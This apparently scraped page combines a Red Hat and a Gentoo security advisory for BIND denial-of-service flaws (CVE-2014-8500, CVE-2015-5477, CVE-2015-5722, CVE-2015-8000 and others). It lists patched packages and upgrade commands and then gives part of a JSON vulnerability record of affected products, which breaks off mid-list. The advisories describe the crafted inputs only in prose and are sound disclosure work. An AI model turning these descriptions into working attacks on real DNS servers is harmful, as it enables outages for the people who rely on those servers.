A denial of service flaw was found in the way BIND followed DNS delegations. A remote attacker could use a specially crafted zone containing a large number of referrals which, when looked up and processed, would cause named to use excessive amounts of memory or crash. (CVE-2014-8500)
A flaw was found in the way BIND handled requests for TKEY DNS resource records. A remote attacker could use this flaw to make named (functioning as an authoritative DNS server or a DNS resolver) exit unexpectedly with an assertion failure via a specially crafted DNS request packet. (CVE-2015-5477)
A denial of service flaw was found in the way BIND parsed certain malformed DNSSEC keys. A remote attacker could use this flaw to send a specially crafted DNS query (for example, a query requiring a response from a zone containing a deliberately malformed key) that would cause named functioning as a validating resolver to crash. (CVE-2015-5722)
A denial of service flaw was found in the way BIND processed certain records with malformed class attributes. A remote attacker could use this flaw to send a query to request a cached record with a malformed class attribute that would cause named functioning as an authoritative or recursive server to crash. (CVE-2015-8000)
Note: This issue affects authoritative servers as well as recursive servers, however authoritative servers are at limited risk if they perform authentication when making recursive queries to resolve addresses for servers listed in NS RRSETs.
Red Hat would like to thank ISC for reporting the CVE-2015-5477, CVE-2015-5722, and CVE-2015-8000 issues. Upstream acknowledges Jonathan Foote as the original reporter of CVE-2015-5477, and Hanno Böck as the original reporter of CVE-2015-5722.
All bind users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. After installing the update, the BIND daemon (named) will be restarted automatically.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1171912 - CVE-2014-8500 bind: delegation handling denial of service 1247361 - CVE-2015-5477 bind: TKEY query handling flaw leading to denial of service 1259087 - CVE-2015-5722 bind: malformed DNSSEC key failed assertion denial of service 1291176 - CVE-2015-8000 bind: responses with a malformed class attribute can trigger an assertion failure in db.c
- Package List:
Red Hat Enterprise Linux Server AUS (v. 6.4):
Source: bind-9.8.2-0.17.rc1.el6_4.7.src.rpm
i386: bind-9.8.2-0.17.rc1.el6_4.7.i686.rpm bind-chroot-9.8.2-0.17.rc1.el6_4.7.i686.rpm bind-debuginfo-9.8.2-0.17.rc1.el6_4.7.i686.rpm bind-libs-9.8.2-0.17.rc1.el6_4.7.i686.rpm bind-utils-9.8.2-0.17.rc1.el6_4.7.i686.rpm
ppc64: bind-9.8.2-0.17.rc1.el6_4.7.ppc64.rpm bind-chroot-9.8.2-0.17.rc1.el6_4.7.ppc64.rpm bind-debuginfo-9.8.2-0.17.rc1.el6_4.7.ppc.rpm bind-debuginfo-9.8.2-0.17.rc1.el6_4.7.ppc64.rpm bind-libs-9.8.2-0.17.rc1.el6_4.7.ppc.rpm bind-libs-9.8.2-0.17.rc1.el6_4.7.ppc64.rpm bind-utils-9.8.2-0.17.rc1.el6_4.7.ppc64.rpm
s390x: bind-9.8.2-0.17.rc1.el6_4.7.s390x.rpm bind-chroot-9.8.2-0.17.rc1.el6_4.7.s390x.rpm bind-debuginfo-9.8.2-0.17.rc1.el6_4.7.s390.rpm bind-debuginfo-9.8.2-0.17.rc1.el6_4.7.s390x.rpm bind-libs-9.8.2-0.17.rc1.el6_4.7.s390.rpm bind-libs-9.8.2-0.17.rc1.el6_4.7.s390x.rpm bind-utils-9.8.2-0.17.rc1.el6_4.7.s390x.rpm
x86_64: bind-9.8.2-0.17.rc1.el6_4.7.x86_64.rpm bind-chroot-9.8.2-0.17.rc1.el6_4.7.x86_64.rpm bind-debuginfo-9.8.2-0.17.rc1.el6_4.7.i686.rpm bind-debuginfo-9.8.2-0.17.rc1.el6_4.7.x86_64.rpm bind-libs-9.8.2-0.17.rc1.el6_4.7.i686.rpm bind-libs-9.8.2-0.17.rc1.el6_4.7.x86_64.rpm bind-utils-9.8.2-0.17.rc1.el6_4.7.x86_64.rpm
Red Hat Enterprise Linux Server AUS (v. 6.5):
Source: bind-9.8.2-0.23.rc1.el6_5.2.src.rpm
i386: bind-9.8.2-0.23.rc1.el6_5.2.i686.rpm bind-chroot-9.8.2-0.23.rc1.el6_5.2.i686.rpm bind-debuginfo-9.8.2-0.23.rc1.el6_5.2.i686.rpm bind-libs-9.8.2-0.23.rc1.el6_5.2.i686.rpm bind-utils-9.8.2-0.23.rc1.el6_5.2.i686.rpm
ppc64: bind-9.8.2-0.23.rc1.el6_5.2.ppc64.rpm bind-chroot-9.8.2-0.23.rc1.el6_5.2.ppc64.rpm bind-debuginfo-9.8.2-0.23.rc1.el6_5.2.ppc.rpm bind-debuginfo-9.8.2-0.23.rc1.el6_5.2.ppc64.rpm bind-libs-9.8.2-0.23.rc1.el6_5.2.ppc.rpm bind-libs-9.8.2-0.23.rc1.el6_5.2.ppc64.rpm bind-utils-9.8.2-0.23.rc1.el6_5.2.ppc64.rpm
s390x: bind-9.8.2-0.23.rc1.el6_5.2.s390x.rpm bind-chroot-9.8.2-0.23.rc1.el6_5.2.s390x.rpm bind-debuginfo-9.8.2-0.23.rc1.el6_5.2.s390.rpm bind-debuginfo-9.8.2-0.23.rc1.el6_5.2.s390x.rpm bind-libs-9.8.2-0.23.rc1.el6_5.2.s390.rpm bind-libs-9.8.2-0.23.rc1.el6_5.2.s390x.rpm bind-utils-9.8.2-0.23.rc1.el6_5.2.s390x.rpm
x86_64: bind-9.8.2-0.23.rc1.el6_5.2.x86_64.rpm bind-chroot-9.8.2-0.23.rc1.el6_5.2.x86_64.rpm bind-debuginfo-9.8.2-0.23.rc1.el6_5.2.i686.rpm bind-debuginfo-9.8.2-0.23.rc1.el6_5.2.x86_64.rpm bind-libs-9.8.2-0.23.rc1.el6_5.2.i686.rpm bind-libs-9.8.2-0.23.rc1.el6_5.2.x86_64.rpm bind-utils-9.8.2-0.23.rc1.el6_5.2.x86_64.rpm
Red Hat Enterprise Linux Server Optional AUS (v. 6.4):
Source: bind-9.8.2-0.17.rc1.el6_4.7.src.rpm
i386: bind-debuginfo-9.8.2-0.17.rc1.el6_4.7.i686.rpm bind-devel-9.8.2-0.17.rc1.el6_4.7.i686.rpm bind-sdb-9.8.2-0.17.rc1.el6_4.7.i686.rpm
ppc64: bind-debuginfo-9.8.2-0.17.rc1.el6_4.7.ppc.rpm bind-debuginfo-9.8.2-0.17.rc1.el6_4.7.ppc64.rpm bind-devel-9.8.2-0.17.rc1.el6_4.7.ppc.rpm bind-devel-9.8.2-0.17.rc1.el6_4.7.ppc64.rpm bind-sdb-9.8.2-0.17.rc1.el6_4.7.ppc64.rpm
s390x: bind-debuginfo-9.8.2-0.17.rc1.el6_4.7.s390.rpm bind-debuginfo-9.8.2-0.17.rc1.el6_4.7.s390x.rpm bind-devel-9.8.2-0.17.rc1.el6_4.7.s390.rpm bind-devel-9.8.2-0.17.rc1.el6_4.7.s390x.rpm bind-sdb-9.8.2-0.17.rc1.el6_4.7.s390x.rpm
x86_64: bind-debuginfo-9.8.2-0.17.rc1.el6_4.7.i686.rpm bind-debuginfo-9.8.2-0.17.rc1.el6_4.7.x86_64.rpm bind-devel-9.8.2-0.17.rc1.el6_4.7.i686.rpm bind-devel-9.8.2-0.17.rc1.el6_4.7.x86_64.rpm bind-sdb-9.8.2-0.17.rc1.el6_4.7.x86_64.rpm
Red Hat Enterprise Linux Server Optional AUS (v. 6.5):
Source: bind-9.8.2-0.23.rc1.el6_5.2.src.rpm
i386: bind-debuginfo-9.8.2-0.23.rc1.el6_5.2.i686.rpm bind-devel-9.8.2-0.23.rc1.el6_5.2.i686.rpm bind-sdb-9.8.2-0.23.rc1.el6_5.2.i686.rpm
ppc64: bind-debuginfo-9.8.2-0.23.rc1.el6_5.2.ppc.rpm bind-debuginfo-9.8.2-0.23.rc1.el6_5.2.ppc64.rpm bind-devel-9.8.2-0.23.rc1.el6_5.2.ppc.rpm bind-devel-9.8.2-0.23.rc1.el6_5.2.ppc64.rpm bind-sdb-9.8.2-0.23.rc1.el6_5.2.ppc64.rpm
s390x: bind-debuginfo-9.8.2-0.23.rc1.el6_5.2.s390.rpm bind-debuginfo-9.8.2-0.23.rc1.el6_5.2.s390x.rpm bind-devel-9.8.2-0.23.rc1.el6_5.2.s390.rpm bind-devel-9.8.2-0.23.rc1.el6_5.2.s390x.rpm bind-sdb-9.8.2-0.23.rc1.el6_5.2.s390x.rpm
x86_64: bind-debuginfo-9.8.2-0.23.rc1.el6_5.2.i686.rpm bind-debuginfo-9.8.2-0.23.rc1.el6_5.2.x86_64.rpm bind-devel-9.8.2-0.23.rc1.el6_5.2.i686.rpm bind-devel-9.8.2-0.23.rc1.el6_5.2.x86_64.rpm bind-sdb-9.8.2-0.23.rc1.el6_5.2.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2014-8500 https://access.redhat.com/security/cve/CVE-2015-5477 https://access.redhat.com/security/cve/CVE-2015-5722 https://access.redhat.com/security/cve/CVE-2015-8000 https://access.redhat.com/security/updates/classification/#important https://kb.isc.org/article/AA-01216 https://kb.isc.org/article/AA-01272 https://kb.isc.org/article/AA-01287 https://kb.isc.org/article/AA-01317
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2016 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFWqhylXlSAg2UNWIIRAqZ/AKCoKFjvPavmvpq8cC3SSEMtpGtycQCfShgo 0jc/9uvkc44V3h5ZDR/fILQ= =90gw -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-dns/bind < 9.10.2_p4 >= 9.10.2_p4
Description
A vulnerability has been discovered in BIND's named utility leading to a Denial of Service condition.
Impact
A remote attacker may be able to cause Denial of Service condition via specially constructed zone data.
Workaround
There is no known workaround at this time.
Resolution
All BIND users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=net-dns/bind-9.10.2_p4"
References
[ 1 ] CVE-2015-1349 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1349 [ 2 ] CVE-2015-4620 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4620 [ 3 ] CVE-2015-5477 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5477 [ 4 ] CVE-2015-5722 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5722 [ 5 ] CVE-2015-5986 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5986
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201510-01
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2015 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201507-0037", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "bind", "scope": "lte", "trust": 1.0, "vendor": "isc", "version": "9.10.2" }, { "model": "bind", "scope": "lte", "trust": 1.0, "vendor": "isc", "version": "9.9.7" }, { "model": "junos 12.1x44-d20", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "bind", "scope": "eq", "trust": 0.6, "vendor": "isc", "version": "9.9.7" }, { "model": "bind", "scope": "eq", "trust": 0.6, "vendor": "isc", "version": "9.10.2" }, { "model": "8.4-release-p12", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "bind a1", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.5" }, { "model": "big-ip wom hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "hp-ux b.11.31.06", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "junos 12.1x44-d33", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "big-ip gtm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "i v4r4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "big-ip apm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "hp-ux c.9.7.3.8.0", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": null }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "i v5r4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "big-ip webaccelerator hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "big-ip gtm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "junos 14.1r3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 12.3r8", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x4.1" }, { "model": "big-ip link controller hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip analytics hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "junos 12.3r5", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "i v5r3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "i v5r2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "bind a5", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.4" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "big-iq device", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.5" }, { "model": "junos 12.1x44-d35", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "bind b3", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.4" }, { "model": "junos 12.1x44-d51", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-iq device", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.2" }, { "model": "i v5r1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.0" }, { "model": "bind b4", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.4" }, { "model": "i v4r1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "junos 14.1x53-d16", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "8.4-release-p9", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip edge gateway 11.1.0-hf2", "scope": null, "trust": 0.3, "vendor": "f5", "version": null }, { "model": "bind", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.4.3" }, { "model": "big-ip asm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "bind rc3", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.3.3" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "clustered data ontap", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "i v5r2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "junos 12.1x44-d34", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "bind p1", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.3.6" }, { "model": "big-ip edge gateway hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "junos 14.2r5", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip apm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "solaris", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "10" }, { "model": "junos 14.1r1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-iq device", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.4" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "bind", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.3.2" }, { "model": "bind 9.5.2-p2", "scope": null, "trust": 0.3, "vendor": "isc", "version": null }, { "model": "9.3-release-p10", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "junos 12.1x47-d10", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "9.3-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "bind -p1", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.2.6" }, { "model": "i v4r1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "big-ip ltm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "opensuse evergreen", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11.4" }, { "model": "junos 12.1x44-d50", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip psm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "junos 14.1r4", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "bind", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.6" }, { "model": "big-ip asm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "junos 14.1x53-d30", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 12.3x48-d15", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip apm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "junos os 12.1x47-d30", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip webaccelerator hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.3" }, { "model": "junos 12.3r12", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "bind 9.5.0a7", "scope": null, "trust": 0.3, "vendor": "isc", "version": null }, { "model": "bind 9.6.0-p1", "scope": null, "trust": 0.3, "vendor": "isc", "version": null }, { "model": "junos 12.3r4.6", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "bind b1", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.2.7" }, { "model": "junos 12.3r2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos d30", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1x44" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "vcx", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.8.17" }, { "model": "bind a4", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.4" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-ip ltm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip analytics hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "junos 15.1r2", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-iq security", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.5" }, { "model": "bind 9.5.0a6", "scope": null, "trust": 0.3, "vendor": "isc", "version": null }, { "model": "8.4-release-p19", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip link controller hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "vm server for", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "x863.3" }, { "model": "big-ip edge gateway 10.2.3-hf1", "scope": null, "trust": 0.3, "vendor": "f5", "version": null }, { "model": "junos 14.2r1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "bind", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.3.5" }, { "model": "smartcloud provisioning for software virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "junos 14.1r2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip asm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "junos 15.2r1", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 13.2x51-d39", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip ltm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-iq security", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.4" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "i v5r3", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "13.2" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "bind p3", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.5.1" }, { "model": "junos d15", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1x44" }, { "model": "junos 13.2r5", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "bind rc2", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.2.7" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0.1" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "junos os 15.1x49-d30", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "bind a1", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.4" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "8.4-release-p8", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "junos 12.3r2-s3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip ltm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "bind rc1", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.2.7" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "big-ip analytics hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "bind", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.4.1" }, { "model": "junos 12.1x46-d20", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "bind", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.3.6" }, { "model": "bind", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.3.4" }, { "model": "bind 9.4.2-p2", "scope": null, "trust": 0.3, "vendor": "isc", "version": null }, { "model": "junos 15.1x53-d20", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 14.1x53-d26", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip gtm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "junos 12.1x44-d55", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos d40", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1x44" }, { "model": "junos 12.1x44-d30.4", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "i v3r7", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "i v4r3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "junos 15.1r1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "8.4-release-p13", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "junos d20", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1x44" }, { "model": "big-ip link controller hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "bind 9.4.3-p5", "scope": null, "trust": 0.3, "vendor": "isc", "version": null }, { 